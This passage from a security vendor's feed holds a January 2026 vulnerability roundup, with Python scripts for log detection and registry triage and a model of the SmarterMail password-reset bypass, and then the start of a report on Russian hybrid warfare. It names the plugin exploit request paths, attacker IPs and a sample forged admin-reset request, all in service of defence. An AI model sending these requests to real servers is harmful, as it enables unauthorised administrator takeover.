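<p>The registry and scheduled-task checks above can be scripted against artifacts exported from a host. The following Python is an added example, not Recorded Future or Microsoft tooling: it parses a <code>reg export</code> dump of the three Outlook keys and a <code>schtasks /query /fo CSV</code> listing, so it runs offline. The sample dumps are constructed, and the meaning attached to Level=1 and LoadMacroProviderOnBoot=1 is an assumption stated in the comments; the page lists PONT_STRING for review without giving an expected value, so the script only reports it.</p>

```python
"""Offline triage of the Outlook VBA persistence artifacts listed above.

Added example, not Recorded Future or Microsoft tooling. Input is text captured
from a host with `reg export` (the HKCU Outlook key) and `schtasks /query /fo CSV`;
the samples at the bottom are constructed.
"""
import csv
import io
import re

SECTION_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
OUTLOOK = r"hkey_current_user\software\microsoft\office\16.0\outlook"


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: raw_data}} from Registry Editor 5.00 text (case-folded)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION_RE.match(line)
        if sec:
            current = keys.setdefault(sec["key"].lower(), {})
            continue
        val = VALUE_RE.match(line)
        if val and current is not None:
            current[val["name"].lower()] = val["data"]
    return keys


def dword(data: str):
    """Decode a 'dword:0000000N' value; None for missing or non-DWORD data."""
    return int(data[6:], 16) if data.startswith("dword:") else None


def outlook_macro_findings(reg: dict) -> list:
    """Flag the value combinations a VBA-project backdoor such as MiniDoor needs."""
    findings = []
    level = dword(reg.get(OUTLOOK + r"\security", {}).get("level", ""))
    # Assumption: Security\Level=1 means "enable all macros"; a clean install leaves it higher.
    if level == 1:
        findings.append(r"Outlook\Security\Level=1: all VBA macros run without prompting")
    boot = dword(reg.get(OUTLOOK, {}).get("loadmacroprovideronboot", ""))
    # Assumption: 1 makes Outlook load VbaProject.OTM at start, which is what gives the VBA project persistence.
    if boot == 1:
        findings.append("LoadMacroProviderOnBoot=1: VbaProject.OTM is loaded at Outlook start")
    pont = reg.get(OUTLOOK + r"\options\general", {}).get("pont_string")
    # The page lists PONT_STRING for review without an expected value; report it for a baseline comparison.
    if pont is not None:
        findings.append(f"PONT_STRING present ({pont}): compare with a clean Outlook profile")
    return findings


def task_findings(schtasks_csv: str) -> list:
    """Return task names matching the 'OneDriveHealth' scheduled task named above."""
    rows = csv.DictReader(io.StringIO(schtasks_csv))
    return [r["TaskName"] for r in rows if "onedrivehealth" in r["TaskName"].lower()]


# Constructed samples of what a compromised host might export.
REG_DUMP = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook]
"LoadMacroProviderOnBoot"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Options\General]
"PONT_STRING"="32,"
"""

SCHTASKS_CSV = '''"TaskName","Next Run Time","Status"
"\\OneDriveHealth","N/A","Ready"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready"
'''

if __name__ == "__main__":
    for finding in outlook_macro_findings(parse_reg_export(REG_DUMP)) + task_findings(SCHTASKS_CSV):
        print("FINDING:", finding)
```

<p>Run it against the exported files rather than the live registry so the same script works from a forensic image; the three registry findings together, plus a recent write to VbaProject.OTM, are the combination worth escalating, since any one of them alone can have a benign explanation.</p>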
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d8e4dc50a83f9e11b1c9b0b7e1e5476bd9fb3016.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="779" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div></div>
        <h3>CVE-2026-23760 | SmarterTools SmarterMail</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added January 26, 2026</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.</p>
        <p><strong>Affected versions:</strong> SmarterTools SmarterMail prior to build 9511</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade to build 9511 or later immediately</li>
          <li>Review administrator account activity logs for unauthorized password resets</li>
          <li>Check the Volume Mounts configuration for suspicious command entries</li>
          <li>Review administrator access patterns and session logs</li>
          <li>Audit system for unauthorized changes made with compromised admin access</li>
        </ul>
        <div></div>
        <h3>CVE-2026-1281 &amp; CVE-2026-1340 | Ivanti Endpoint Manager Mobile</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: CVE-2026-1281 added January 29, 2026</p>
        <p><strong>Why this matters:</strong> Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.</p>
        <p><strong>Affected versions:</strong> Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm</li>
          <li>Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)</li>
          <li>Monitor for unusual Apache RewriteMap activity</li>
          <li>Review logs for crafted HTTP parameters to app store retrieval routes</li>
          <li>Check for unauthorized code execution attempts via RewriteRule handling</li>
        </ul>
        <p><strong>Exposure:</strong> EPMM instances accessible over corporate networks or VPN connections</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13dd09f2863edb79f18c40c52cdf0379e47eecaf5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Risk Rules History from</em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Technical Deep Dive: Exploitation Analysis</h2>
        <h3>APT28's Operation Neusploit (CVE-2026-21509)</h3>
        <p><strong>The multi-stage attack chain:</strong> CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:</p>
        <ul>
          <li><strong>Initial delivery</strong> – Specially crafted RTF file exploits CVE-2026-21509</li>
          <li><strong>Server-side evasion</strong> – Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent</li>
          <li><strong>Dropper variants</strong> – Two distinct infection paths deployed based on targeting:
            <ul>
              <li><strong>Variant 1 (MiniDoor):</strong> Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses</li>
              <li><strong>Variant 2 (PixyNetLoader):</strong> Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking</li>
            </ul>
          </li>
        </ul>
        <p><strong>Why this matters:</strong> APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.</p>
        <div></div>
        <h3>Modular DS WordPress Plugin Exploitation (CVE-2026-23550 &amp; CVE-2026-23800)</h3>
        <p><strong>The authentication bypass chain:</strong> CVE-2026-23550 enables administrator-level access without authentication:</p>
        <ul>
          <li>Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification</li>
          <li>/api/modular-connector/login flow grants access based on site connector enrollment state</li>
          <li>If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session</li>
          <li>CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&amp;origin=mo&amp;type=x</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23550:</strong></p>
        <ul>
          <li>45[.]11[.]89[.]19</li>
          <li>185[.]196[.]0[.]11</li>
          <li>64[.]188[.]91[.]37</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23800:</strong></p>
        <ul>
          <li>62[.]60[.]131[.]161</li>
          <li>185[.]102[.]115[.]27</li>
          <li>backup[@]wordpress[.]com</li>
          <li>backup1[@]wordpress[.]com</li>
        </ul>
        <p><strong>Why this matters:</strong> WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.</p>
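<p>Both exploitation paths leave a trace in ordinary web server access logs. The following Python is an added detection example, not Recorded Future or Modular DS code: it flags requests to the connector login route and POSTs to the REST user-creation route carrying the origin=mo marker, marks hits from the IPs listed above, and records whether the server answered 2xx. The log lines and the non-IoC addresses are constructed. Because an access log does not carry the POST body, the "no user identifier supplied" condition for CVE-2026-23550 cannot be confirmed here; any hit on that route is reported for follow-up in the plugin's own logs.</p>

```python
"""Access-log detection for the two Modular DS exploitation paths described above.

Added example, not Recorded Future or Modular DS code. It works on Combined Log
Format lines (the nginx/Apache default); the sample lines and the non-IoC
addresses are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Source addresses the page associates with the two CVEs (defanged there, plain here).
KNOWN_IPS = {"45.11.89.19", "185.196.0.11", "64.188.91.37",
             "62.60.131.161", "185.102.115.27"}


def classify(line: str):
    """Return a finding for a request on either exploitation path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    rules = []
    # Path 1: the connector login flow that can hand out an administrator session.
    if url.path.rstrip("/").endswith("/api/modular-connector/login"):
        rules.append("CVE-2026-23550 connector login")
    # Path 2: REST user creation with the origin=mo marker. The page shows the
    # ?rest_route= form; the /wp-json/ pretty-permalink form is added as a generalization.
    rest_route = query.get("rest_route", [""])[0]
    users_route = rest_route.startswith("/wp/v2/users") or url.path.endswith("/wp-json/wp/v2/users")
    if users_route and query.get("origin") == ["mo"] and m["method"] == "POST":
        rules.append("CVE-2026-23800 REST user creation")
    if not rules:
        return None
    status = int(m["status"])
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "rules": rules,
        "known_ioc": m["ip"] in KNOWN_IPS,
        # A 2xx on the user-creation POST usually means an account now exists; 4xx means it was refused.
        "succeeded": 200 <= status < 300,
    }


def scan(lines):
    """Apply classify() to every line and keep the hits."""
    return [hit for hit in (classify(ln) for ln in lines) if hit]


# Constructed log lines: two known-IoC hits, one benign request, one refused attempt.
SAMPLE_LOG = [
    '45.11.89.19 - - [14/Jan/2026:03:12:07 +0000] "POST /api/modular-connector/login HTTP/1.1" 200 512 "-" "python-requests/2.32"',
    '62.60.131.161 - - [15/Jan/2026:11:40:51 +0000] "POST /?rest_route=/wp/v2/users&origin=mo&type=x HTTP/1.1" 201 388 "-" "curl/8.5"',
    '203.0.113.7 - - [15/Jan/2026:12:01:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2044 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [16/Jan/2026:08:15:00 +0000] "POST /?rest_route=/wp/v2/users&origin=mo&type=x HTTP/1.1" 401 120 "-" "curl/8.5"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

<p>A 2xx on the user-creation route is the hit to act on first: compare the WordPress user table against that timestamp, since a freshly created administrator, not the request itself, is the persistent damage.</p>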
        <div></div>
        <h3>SmarterMail Authentication Bypass (CVE-2026-23760)</h3>
        <p><strong>The password reset flaw:</strong> CVE-2026-23760 exposes privileged password reset to anonymous callers:</p>
        <ul>
          <li>ForceResetPassword controller attribute explicitly permits unauthenticated access</li>
          <li>Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context</li>
          <li>System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword</li>
          <li>Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls</li>
        </ul>
        <p><strong>Why this matters:</strong> Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.</p>
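<p>The four bullets above describe a pattern that is easy to see side by side in code. The following Python is an added, simplified model, not SmarterTools code: the request shape, the user store and the session table are assumptions. It contrasts a handler that branches on a client-supplied IsSysAdmin flag and sets NewPassword directly with one that requires a session, binds the target account to the caller, checks OldPassword, and never reads the account type from the request.</p>

```python
"""Simplified model of the CVE-2026-23760 logic described above.

Added illustration, not SmarterTools code: the request shape, the user store
and the session table are assumptions.
"""
from dataclasses import dataclass, field
import hashlib
import hmac
import secrets


def _hash(password: str, salt: str) -> str:
    # PBKDF2 stands in for whatever hashing the real product uses (assumption).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 50_000).hex()


@dataclass
class Account:
    name: str
    is_sysadmin: bool
    salt: str = field(default_factory=lambda: secrets.token_hex(8))
    pw_hash: str = ""

    def set_password(self, password: str) -> None:
        self.pw_hash = _hash(password, self.salt)

    def check_password(self, password: str) -> bool:
        return hmac.compare_digest(self.pw_hash, _hash(password, self.salt))


# Constructed user store and server-side session table (token -> account name).
USERS = {"admin": Account("admin", is_sysadmin=True),
         "alice": Account("alice", is_sysadmin=False)}
USERS["admin"].set_password("Correct-Horse-1")
USERS["alice"].set_password("alice-pass")
SESSIONS = {"tok-alice": "alice"}


def vulnerable_force_reset(body: dict) -> str:
    """The flaw as the text describes it: anonymous callers allowed, account type
    taken from the client's IsSysAdmin boolean, OldPassword never checked."""
    if body.get("IsSysAdmin"):
        acct = USERS.get(body.get("Username", ""))   # the only "basic check"
        if acct is None:
            return "unknown account"
        acct.set_password(body["NewPassword"])       # Password set straight from input
        return "ok"
    return "unsupported"   # the non-admin branch is not part of the bypass


def hardened_force_reset(session_token: str, body: dict) -> str:
    """Require an authenticated session, bind the target to the caller, verify the
    old password, and never read the account type from the request."""
    caller_name = SESSIONS.get(session_token)
    if caller_name is None:
        return "401 unauthenticated"
    caller = USERS[caller_name]
    target = USERS.get(body.get("Username", ""))
    if target is None or target is not caller:
        # Self-service only; administrative resets need a separately authorized path.
        return "403 forbidden"
    if not caller.check_password(body.get("OldPassword", "")):
        return "403 bad old password"
    # target.is_sysadmin comes from the store; nothing in `body` can change it.
    target.set_password(body["NewPassword"])
    return "ok"


def demo() -> dict:
    """Run the same anonymous attacker request against both handlers."""
    attack = {"IsSysAdmin": True, "Username": "admin", "NewPassword": "pwned"}
    vuln = vulnerable_force_reset(attack)
    admin_pwned = USERS["admin"].check_password("pwned")
    USERS["admin"].set_password("Correct-Horse-1")          # restore before the second run
    return {
        "vulnerable": vuln,                                   # "ok"
        "admin_pwned": admin_pwned,                           # True
        "hardened_anon": hardened_force_reset("", attack),    # "401 unauthenticated"
        "hardened_cross_account": hardened_force_reset(
            "tok-alice", {"Username": "admin", "OldPassword": "alice-pass", "NewPassword": "pwned"}),
        "admin_intact": USERS["admin"].check_password("Correct-Horse-1"),
    }


if __name__ == "__main__":
    print(demo())
```

<p>The fix is not a stricter check on IsSysAdmin but removing it from the trust boundary altogether: whether the caller is a system administrator, and which account they may touch, must come from state the server already holds, so the request body has nothing left to lie about.</p>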
        <h2>Detection &amp; Remediation Resources</h2>
        <h3>Nuclei Templates from Insikt Group®</h3>
        <p>Recorded Future customers can access Nuclei templates for:</p>
        <ul>
          <li><strong>CVE-2025-8110 (Gogs) -</strong> Version detection and fingerprinting check</li>
          <li><strong>CVE-2026-23760 (SmarterMail) -</strong> Authentication bypass validation</li>
        </ul>
        <h3>Recorded Future Product Integrations</h3>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize based on active exploitation data, including APT28 targeting</li>
          <li><strong><a href="https://www.recordedfuture.com/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets</li>
          <li><strong><a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Monitor vendor vulnerabilities across your supply chain</li>
        </ul>
        <h2>January 2026 Summary</h2>
        <p><strong>State-sponsored zero-days return.</strong> APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.</p>
        <p><strong>Authentication bypass dominates enterprise risk.</strong> Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.</p>
        <p><strong>Legacy vulnerabilities persist.</strong> CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.</p>
        <h2>Take Action</h2>
        <p>Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our <a href="https://www.recordedfuture.com/demo">demo center</a> for live examples, or dive deeper with <a href="https://www.recordedfuture.com/research">Insikt Group research</a> for technical threat intelligence.</p>
        <p><strong>About Insikt Group®:</strong></p>
        <p>Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Preparing for Russia’s New Generation Warfare in Europe]]></title>
            <link>https://www.recordedfuture.com/research/preparing-for-russias-new-generation-warfare-in-europe</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/preparing-for-russias-new-generation-warfare-in-europe</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Russia is escalating its hybrid warfare against NATO into a coordinated, full-scale campaign blending cyber attacks, sabotage, and influence operations. Read the full report to understand what New Generation Warfare means for your organization.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Since its full-scale invasion of Ukraine in February 2022, Russia has waged what we assess is largely opportunistic, though increasingly aggressive, hybrid warfare in NATO territory. Moscow has very likely not yet leveraged its full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Over the next two years, Russian President Vladimir Putin will likely escalate Russia’s hybrid warfare campaign against NATO members into a full-fledged campaign likely consistent with a Russian military doctrine called New Generation Warfare (NGW). Putin will likely use this campaign to degrade NATO political unity and defense capabilities, reinforce Russia’s network of overt and covert assets across NATO, and optimize the physical and political environment, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>In a full-scale NGW campaign in NATO territory, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is more intentionally planned and aims to project Russian power and weaken European defenses on a systemic level. An NGW campaign would very likely involve Russia using the same tactics it is currently using, including sabotage operations, influence operations, territorial waters and airspace violations, and exploitation of some NATO states’ dependence on Russian oil and gas. The primary differences between Russia’s current operations in Europe and an NGW campaign would include greater geographic breadth of those operations; greater frequency of operations; and Russia likely using tactics simultaneously and in coordinated ways. For example, likely Russia-directed threat actors might use a drone to violate the airspace over a NATO state’s airport, forcing the temporary closure of that airport, coupled with a distributed denial-of-service attack on the airport’s internal communications system. Russia might then post a video of the incidents through one of its overt or covert propaganda outlets, arguing that they show NATO cannot adequately protect its aviation network.</p>
        <p>An NGW campaign in NATO territory would very likely have significant implications for private and public sector entities, including degradation of critical infrastructure, reputational risk for individuals and companies named in Russian influence operation campaigns, and reduced public confidence in the government’s ability to ensure their safety.</p>
        <p>Over the next three to five years, Putin will likely evaluate the feasibility of moving from an NGW-like campaign in Europe to a kinetic military incursion. Factors Putin would likely weigh when making such a decision include NATO military capabilities, the likelihood that the US would defend a NATO state if it were attacked, and Russian military capabilities. However, even if the necessary conditions for such an operation emerge, the probability of a proactive Russian military operation into NATO territory very likely remains low.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Russia’s hybrid warfare campaign in NATO territory between February 2022 and January 2026 has been increasingly aggressive, but likely opportunistic and not reflective of Russia’s full cyber, influence operations, and sabotage capabilities.</li>
          <li>Putin likely views the next two years as an opportunity to test NATO’s defensive capabilities and prepare the physical and psychological environment, should he decide to launch a military incursion. Putin likely assesses that the 2028 US presidential election could lead to a US president more willing to commit US resources to NATO. As such, Putin likely views the next two years as an opportunity to exploit existing US-NATO tensions to weaken NATO’s unity and ability to defend itself.</li>
          <li>Russia’s escalated aggression against NATO over the next two years is likely to have the hallmarks of a Russian military doctrine called New Generation Warfare (NGW), which combines sabotage operations, cyberattacks, influence operations, and other non-military actions to undermine the enemy’s confidence and prepare the physical and psychological environment, should Russia elect to escalate into a kinetic military campaign.</li>
          <li>A full-scale NGW campaign would likely involve an intensified campaign of tactics Russia has used against NATO in the last few years, including sabotage operations, influence operations, violations of NATO airspace with drones and jets, violations of NATO states’ territorial waters, targeting of undersea cables, and exploitation of some NATO states’ dependence on Russian gas and oil. Russia would likely deploy these tactics more frequently, across more states simultaneously, and would likely use tactics simultaneously in an attempt to strain NATO resources.</li>
          <li>A full-scale NGW campaign would have significant implications for private and public sector entities operating in NATO territory, including disruption to critical services, reputational risk for individuals and firms named in influence campaigns, supply chain disruptions, and reduced public trust in the government’s ability to safeguard critical infrastructure. The fact that most of the critical infrastructure in NATO territory is privately owned means public-private partnerships will be essential in mitigating the impact of escalated Russian aggression.</li>
        </ul>
        <h2>Russia Likely to Escalate into New Generation Warfare Campaign in Europe Over Next Two Years</h2>
        <p>Since Russia’s full-scale invasion of Ukraine in February 2022, it has waged what Insikt Group assesses is largely opportunistic, though increasingly aggressive, hybrid warfare in Europe. These actions, though destructive, have very likely not leveraged Russia’s full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Nonetheless, Russian president Vladimir Putin very likely still prioritizes weakening European unity and defensive capabilities in service to his overarching foreign policy goal of <a href="https://mid.ru/en/foreign_policy/fundamental_documents/1860586/">replacing</a> the US-led international system with a multipolar world in which Russia, the US, and China are relatively equal in terms of geopolitical influence. Putin very likely judges that <a href="https://www.whitehouse.gov/wp-content/uploads/2025/12/2025-National-Security-Strategy.pdf">uneven</a> US assistance to European defensive efforts creates a window of opportunity for Russia to weaken Europe’s ability to resist Russian aggression. Putin likely views recent US-NATO tensions, such as the US’s articulated <a href="https://time.com/7354005/trump-davos-speech-greenland/">intention</a> to control Greenland, as an opportunity to exacerbate the strategic distance between the US and NATO, thereby weakening the transatlantic partnership that has formed the core of the US-led, post-World War II security architecture. Putin also likely views the next two years as an opportunity to optimize the physical and informational environment in Europe, should he decide to launch a kinetic military attack against Europe.</p>
        <p>Putin very likely views this window of opportunity as finite. He likely recognizes that the 2028 US presidential election could result in a US president more willing to commit US military and political resources to amplifying Europe’s defensive capabilities. As such, over the next two years, Putin will likely escalate Russia’s hybrid warfare against Europe into an expanded campaign that is likely consistent with the principles of Russian New Generation Warfare (NGW) –– a warfare doctrine <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">espoused</a> by senior Russian military officials emphasizing control of the information and psychological spaces, as well as the use of undeclared special forces, to weaken an enemy prior to using traditional military forces.</p>
        <p>Europe’s efforts to bolster its defenses against current levels of Russian hybrid warfare likely reinforce Putin’s perception that Europe is motivated to weaken Russia, thereby likely making him more motivated to target Europe. Putin’s perception that Europe’s defensive efforts are actually a threat to Russia is likely rooted in his calculus that NATO is fundamentally an anti-Russia bloc. Putin has substantiated this assessment by pointing to actions such as NATO’s expansion to include former Warsaw Pact countries and its decision to install missile defense systems in Poland.<sup>1</sup></p>
        <h2>New Generation Warfare Origins and Principles</h2>
        <p>Insikt Group assesses that much of Russia’s aggressive foreign policy actions since the annexation of Crimea in March 2014 –– which marked the beginning of Putin’s more assertive efforts to push back against perceived Western efforts to weaken Russia –– have been consistent with NGW, a Russian doctrine in which the state aims to bring about political change in another country primarily by using overt and covert influence tools, as opposed to conventional military force. These tools can include influence operations, sabotage operations, and exploiting economic leverage.</p>
        <p>New Generation Warfare is typically associated with Chief of the General Staff Valery Gerasimov’s 2013 <a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">article</a> in the Russian journal <em>Military-Industrial Kurier</em>, though NGW is essentially a modern version of Soviet active measures. “Active measures” (<em>aktivnye meropriyatiya</em>) was a term <a href="https://www.marshallcenter.org/en/publications/security-insights/active-measures-russias-covert-geopolitical-operations-0">used</a> by the Soviet Union from the 1950s onwards to describe covert influence and subversion operations, including establishing front organizations, backing pro-Soviet political movements abroad, and attempting to orchestrate regime change in foreign countries. Active measures declined during the 1980s and 1990s, but Putin revived its use in the early 2000s. Indeed, in 2007, retired major-general Alexander Vladimirov alluded to that revival when he stated that “modern wars are waged on the level of consciousness and ideas” and that “modern humanity exists in a state of permanent war” in which it is “eternally oscillating between phases of actual armed struggle and constant preparation for it.”<sup>2</sup></p>
        <p>Despite the long history of Russia using active measures, Gerasimov’s 2013 article provides the most comprehensive account of how current Russian military leaders likely view this doctrine. Gerasimov’s article suggests that he views NGW both as the reality of modern warfare and as a preferred way of weakening enemies. Gerasimov argued that the Arab Spring demonstrated that modern wars are not declared conflicts between traditional militaries, but instead depend more on a combination of declared military force and tactics such as domination of the information space, targeting of critical enemy facilities, “asymmetric and indirect operations,” and the use of unofficial special forces. He argued that “the very ‘rules of war’ have changed. The role of nonmilitary means of achieving political and strategic goals has grown and, in many cases, they have exceeded the power of force of weapons in their effectiveness.”</p>
        <p>The following table, taken from a translation of the article, shows Gerasimov’s view of traditional warfare as opposed to New Generation Warfare:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a2e8f66cd46382f09a2845436e016ce2d9e46822.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="852" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>New Generation Warfare and traditional warfare forms and methods (Source:</em> <em><a href="https://www.armyupress.army.mil/portals/7/military-review/archives/english/militaryreview_20160228_art008.pdf">Military Review</a>)</em></div>
          </div>
        </div>
        <p>We assess that Russia’s campaign in Ukraine, starting with the annexation of Crimea in March 2014 and extending to its ongoing full-scale military operation, bears many of the hallmarks of NGW. Russia’s military operations more closely aligned with NGW principles from 2014 through 2021; after Russia’s full-scale invasion of Ukraine in February 2022, the Russian military transitioned to more traditional operations. Russia’s exploitation of influence operations and asymmetric warfare has been a feature of its operations since 2014, and since 2022, Russia has <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">expanded</a> asymmetric and sabotage operations in Europe likely as part of a multi-faceted strategy to use power exertion in Ukraine and Europe to weaken the Western geopolitical system.</p>
        <p>This does not mean that Russian military leadership has consciously used NGW as its guiding principle in Ukraine at all times; indeed, we lack the insight into Russian military leadership thinking to assess with high confidence the principles it is employing. Rather, the combination of Gerasimov’s writings and observation of Russian operations in Ukraine means we can assess with medium confidence that Russia’s Ukraine operations prior to 2022 often reflected NGW principles. As such, we assess that NGW is a useful framework for understanding Russian military operations.</p>
        <div>
          <div>
            <div><strong>NGW Principle</strong></div>
            <div><strong>Example of How the Ukraine Operation Exemplifies Principle</strong></div>
          </div>
          <div>
            <div>Initiation of military operations by groupings of line units in peacetime</div>
            <div><strong>March 2014–February 2022:</strong> Russian regular line units (Russian Airborne Forces [VDV], Naval Infantry, and Main Intelligence Directorate [GRU]-controlled <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">unit</a> formations) entered Ukrainian territory, <a href="https://digitallibrary.un.org/record/767883">annexed</a> Crimea, and <a href="https://www.osce.org/sites/default/files/f/documents/5/d/196991.pdf">operated</a> in eastern Ukraine without a declared state of war. In eastern Ukraine, troops operated under attempted deniability, with Moscow claiming the operations were being <a href="https://www.osce.org/sites/default/files/f/documents/1/f/146341.pdf">conducted</a> by sympathetic Ukrainian separatist forces.<br /><br /><strong>February 2022–January 2026:</strong> Though Russia acknowledged its presence throughout Ukraine, it still operates<sup>3</sup> without a full declaration of war, instead casting its campaign as a “special military operation.”</div>
          </div>
          <div>
            <div>Highly maneuverable, noncontact combat operations of interbranch groupings of line units</div>
            <div><strong>March 2014–February 2022:</strong> Russian battalion tactical groups (BTGs) generally <a href="https://www.rusi.org/explore-our-research/publications/commentary/getting-know-russian-battalion-tactical-group">demonstrated</a> high operational mobility, integrating ground forces, artillery, electronic warfare, and intelligence, surveillance, and reconnaissance (ISR) assets.<br /><br /><strong>February 2022–January 2026:</strong> As Russia has attempted to take more territory, it has <a href="https://www.rusi.org/explore-our-research/publications/commentary/attritional-art-war-lessons-russian-war-ukraine">transitioned</a> to a greater emphasis on attritional, contact-heavy warfare.</div>
          </div>
          <div>
            <div>Reduction of the military-economic potential of the enemy state via the destruction of critically important military and civilian infrastructure</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently <a href="https://ukraine.ohchr.org/en/Increasing-attacks-on-Ukraine-s-energy-infrastructure-place-civilians-at-risk-UN-human-rights-monitors-warn">attempted</a> to degrade Ukraine’s critical infrastructure, including through long-range strikes and cyberattacks <a href="https://www.cisa.gov/news-events/ics-alerts/ir-alert-h-16-056-01">targeting</a> power plants, transportation and logistics hubs, and defense-industrial facilities.</div>
          </div>
          <div>
            <div>Mass use of precision weaponry, special operations forces, and robotics systems</div>
